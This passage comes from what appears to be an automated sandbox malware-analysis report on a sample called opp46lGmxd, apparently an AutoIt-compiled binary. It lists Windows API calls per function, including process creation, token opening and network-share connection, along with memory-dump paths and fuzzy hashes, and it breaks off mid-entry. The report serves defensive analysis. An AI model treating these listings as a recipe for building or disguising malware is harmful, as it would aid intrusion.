                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: b11281ad2689f11efc57401594f678114364d870981c6c389537dae205043503
                                                      • Instruction ID: d60167828fdf5d7797840cf1674f99d5f34604b75eb091de19af37e5ea772798
                                                      • Opcode Fuzzy Hash: b11281ad2689f11efc57401594f678114364d870981c6c389537dae205043503
                                                      • Instruction Fuzzy Hash: 8C113035900509AFCF04FBA4DE96DEEB7B8EF58310B144065F506A7261DF30AE14CBA1
                                                      Function 00AB9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AB9043
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AB9055
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AB906B
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AB9086
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 531468ccfad5bd092af071f292b66c2b3681ddea193805e7083566e7b283ede7
                                                      • Instruction ID: 416e45415a2812b0b7f83d94ab9f66bf52211693fc19a1a410d7d310e9d776d4
                                                      • Opcode Fuzzy Hash: 531468ccfad5bd092af071f292b66c2b3681ddea193805e7083566e7b283ede7
                                                      • Instruction Fuzzy Hash: CD115E79900218FFDB10DFA5CD84EDEBB78FB48310F2040A5EA04B7251D6716E10DB90
                                                      Function 00A61290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00A612D8
                                                      • GetClientRect.USER32(?,?), ref: 00A9B84B
                                                      • GetCursorPos.USER32(?), ref: 00A9B855
                                                      • ScreenToClient.USER32(?,?), ref: 00A9B860
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: aa68fa6245708baddc5a06020f75efcf4cff2f8762f8dc8f24cd66785bd3caa2
                                                      • Instruction ID: 50d03859f3f94855f3473a61ebc5882b25255dae1e7bd525bec4f5750cdad737
                                                      • Opcode Fuzzy Hash: aa68fa6245708baddc5a06020f75efcf4cff2f8762f8dc8f24cd66785bd3caa2
                                                      • Instruction Fuzzy Hash: 7D113A75A00099AFCB10DFA8D9959FE7BB8FB05301F104466F901E7150C730BA528BA5
                                                      Function 00AC1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC166F
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC1694
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC169E
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC16D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: 7a5cc7553621452a7f8ec749803df5037a8606b14bb16c350d3162da6b94223a
                                                      • Instruction ID: 91a5c6270bf6920eb4f1444a9e53c5956dda0e03d52b721c6776c537e9da8204
                                                      • Opcode Fuzzy Hash: 7a5cc7553621452a7f8ec749803df5037a8606b14bb16c350d3162da6b94223a
                                                      • Instruction Fuzzy Hash: 6D115A31E0051CDBCF00EFE5D988BEEBB78FF0A711F064559EA44BA241CB3095608B96
                                                      Function 00A97207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction ID: d7d2223cfe6869ad8d7babb635c18dc0740dcc748dcd3ed1d97e062e1d191e0f
                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction Fuzzy Hash: CA018C7626814ABBCF125F84CC018EE3FA2BF29340F088615FA1858031C237C9B1ABA1
                                                      Function 00AEB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00AEB59E
                                                      • ScreenToClient.USER32(?,?), ref: 00AEB5B6
                                                      • ScreenToClient.USER32(?,?), ref: 00AEB5DA
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AEB5F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: c65bf5cdee33ab8be1e7ca095b882ee16ff1f8eb05fcb9ad53fb8271734dddcd
                                                      • Instruction ID: 3672c11ff7e51215ad1d78bfef2ce381e9db03aa3692e4c1473f584d01da9707
                                                      • Opcode Fuzzy Hash: c65bf5cdee33ab8be1e7ca095b882ee16ff1f8eb05fcb9ad53fb8271734dddcd
                                                      • Instruction Fuzzy Hash: 951146B5D00249EFDB41DF99D4849EEFBB5FB08310F108166E915E3220D735AA558F60
                                                      Function 00AEB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AEB8FE
                                                      • _memset.LIBCMT ref: 00AEB90D
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B27F20,00B27F64), ref: 00AEB93C
                                                      • CloseHandle.KERNEL32 ref: 00AEB94E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: 996178849d968a9a2c51f923f8a066aef57898a5d72781f028534d4aeca01e78
                                                      • Instruction ID: 0c8ed641204d741ea06f3422554307f2382490d944f33d59ee76db6b55b3c06e
                                                      • Opcode Fuzzy Hash: 996178849d968a9a2c51f923f8a066aef57898a5d72781f028534d4aeca01e78
                                                      • Instruction Fuzzy Hash: F0F082B25883907FF6207761AD49FBB3A9CEB08754F004060BB08DA1A6DF714D0187BC
                                                      Function 00AC6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00AC6E88
                                                        • Part of subcall function 00AC794E: _memset.LIBCMT ref: 00AC7983
                                                      • _memmove.LIBCMT ref: 00AC6EAB
                                                      • _memset.LIBCMT ref: 00AC6EB8
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00AC6EC8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: a31cc8058503f7d3c772955754e34731f782037cf83ab2dc23485e3f27a67408
                                                      • Instruction ID: 1c1fb93f26410055f476896f874cf431182bdfe43f80bf9c56a5b5d8e07e2fc9
                                                      • Opcode Fuzzy Hash: a31cc8058503f7d3c772955754e34731f782037cf83ab2dc23485e3f27a67408
                                                      • Instruction Fuzzy Hash: 62F0543A100210ABCF016F55DD85F89BB29EF45320F14C065FE085F216C731A911CBB4
                                                      Function 00AEC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A6134D
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6135C
                                                        • Part of subcall function 00A612F3: BeginPath.GDI32(?), ref: 00A61373
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6139C
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AEC030
                                                      • LineTo.GDI32(00000000,?,?), ref: 00AEC03D
                                                      • EndPath.GDI32(00000000), ref: 00AEC04D
                                                      • StrokePath.GDI32(00000000), ref: 00AEC05B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: db15f90772be7615f15415305d2c415b47b35e2ffcd63dd86325553da5435c71
                                                      • Instruction ID: c49bc8baceb96c5a4e4936445db2b13ca871fe1a791eea569a4fe7ccfb6f7ae7
                                                      • Opcode Fuzzy Hash: db15f90772be7615f15415305d2c415b47b35e2ffcd63dd86325553da5435c71
                                                      • Instruction Fuzzy Hash: B4F08232041299FFDB22AF95AC09FCE3F69AF19721F044011FB11690E287755662CFD5
                                                      Function 00ABA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ABA399
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ABA3AC
                                                      • GetCurrentThreadId.KERNEL32 ref: 00ABA3B3
                                                      • AttachThreadInput.USER32(00000000), ref: 00ABA3BA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: fde8c94531b570229ed50ab6136b73be10af98d1078d45d746730cd9f228d647
                                                      • Instruction ID: 8209f514f1a6fb97765a6770282a8ba39429e8ee53fb2d4ae2fad3105c331bec
                                                      • Opcode Fuzzy Hash: fde8c94531b570229ed50ab6136b73be10af98d1078d45d746730cd9f228d647
                                                      • Instruction Fuzzy Hash: 10E0C9315453A8BBDB209BA2DC4DEDB7F5CEF267A1F008025F609990A1C6718541DBA1
                                                      Function 00A62218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00A62231
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00A6223B
                                                      • SetBkMode.GDI32(?,00000001), ref: 00A62250
                                                      • GetStockObject.GDI32(00000005), ref: 00A62258
                                                      • GetWindowDC.USER32(?,00000000), ref: 00A9C0D3
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A9C0E0
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00A9C0F9
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00A9C112
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00A9C132
                                                      • ReleaseDC.USER32(?,00000000), ref: 00A9C13D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: dc60f7347493e1fc8e66283e4a5d62d95792a3a0c583ae8098e72a63fe6df4aa
                                                      • Instruction ID: fe990df61a0d96946170b6b9eef61d7f8fc3266010cb1db72d5e901fb1f9bb0f
                                                      • Opcode Fuzzy Hash: dc60f7347493e1fc8e66283e4a5d62d95792a3a0c583ae8098e72a63fe6df4aa
                                                      • Instruction Fuzzy Hash: 10E03932200688EEEF219FA8EC497D83B24EB15332F108366FB69480E187714A81DB21
                                                      Function 00AB8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00AB8C63
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AB882E), ref: 00AB8C6A
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AB882E), ref: 00AB8C77
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AB882E), ref: 00AB8C7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 991854a70dcb5dd327ba275ea52aa0ab7bd088098154be526695f9cc43adc42a
                                                      • Instruction ID: abe3ff2e6a84c63cadb0eb554bd8e554503014ebaa21522878806ab6c94b3a65
                                                      • Opcode Fuzzy Hash: 991854a70dcb5dd327ba275ea52aa0ab7bd088098154be526695f9cc43adc42a
                                                      • Instruction Fuzzy Hash: F6E08676642251DFD7609FF46D4CB963FACEF51792F054828B645CD041EA388542CB61
                                                      Function 00AA2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00AA2187
                                                      • GetDC.USER32(00000000), ref: 00AA2191
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AA21B1
                                                      • ReleaseDC.USER32(?), ref: 00AA21D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 2510d8642dd9260f90822e7d03419b35d5d2f9ea41c398d6a45ce9db62a9d399
                                                      • Instruction ID: f65495336f2bfa5ca15e34e6df11e761c13037f45409da189a189f435ebbd68a
                                                      • Opcode Fuzzy Hash: 2510d8642dd9260f90822e7d03419b35d5d2f9ea41c398d6a45ce9db62a9d399
                                                      • Instruction Fuzzy Hash: 29E01A75800254EFDB019FE4C848AADBBF5FB5C360F10C425F95A9B260DB3881429F40
                                                      Function 00AA219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00AA219B
                                                      • GetDC.USER32(00000000), ref: 00AA21A5
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AA21B1
                                                      • ReleaseDC.USER32(?), ref: 00AA21D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 7745d61742ba82a1819752c46032976345dc69c7b4cbb59045d8a54f9cf380e4
                                                      • Instruction ID: 5c92fe492b74e2c1570bdf909a8616426b4ad20611f817e5fdb153a2ddf8320f
                                                      • Opcode Fuzzy Hash: 7745d61742ba82a1819752c46032976345dc69c7b4cbb59045d8a54f9cf380e4
                                                      • Instruction Fuzzy Hash: F3E01A75800244EFDB019FF4C84869DBBF5FB5C360F10C025F95A9B220DB3891429F40
                                                      Function 00ABB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00ABB981
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      • Opcode ID: 42fe8d67973769a3e1868016bc6251196b92f02866de040fe921678c3a70f918
                                                      • Instruction ID: 06d4627702bda8caf27ad086f6ee53eb1da88148d3897a7c9ddeaf346ea3bf83
                                                      • Opcode Fuzzy Hash: 42fe8d67973769a3e1868016bc6251196b92f02866de040fe921678c3a70f918
                                                      • Instruction Fuzzy Hash: 8F916F706106019FDB64DF68C884BA6B7F9FF49710F14856DF94ACB291DBB1E841CB60
                                                      Function 00ACB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • __wcsnicmp.LIBCMT ref: 00ACB298
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00ACB361
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: b24669cbe19a48a89c9e0d8eeb139ca2bdbc654cb373b5f74c894d928071c9ac
